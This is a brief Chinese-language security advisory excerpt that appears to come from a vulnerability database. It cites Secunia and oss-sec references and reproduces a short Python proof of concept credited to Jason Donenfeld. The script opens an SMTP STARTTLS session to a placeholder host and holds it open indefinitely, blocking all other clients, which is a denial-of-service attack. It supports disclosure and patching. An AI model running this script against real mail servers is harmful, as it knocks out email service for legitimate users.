链接:http://secunia.com/advisories/53353/ http://seclists.org/oss-sec/2013/q2/362 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Jason Donenfeld (Jason@zx2c4.com)提供了如下测试方法:
#!/usr/bin/env python2 import smtplib import time print "[+] Connecting to server and initiating TLS" smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587) smtp.starttls() print "[+] No clients will be able to connect as long as this remains open." time.sleep(100000000)建议: -------------------------------------------------------------------------------- 厂商补丁: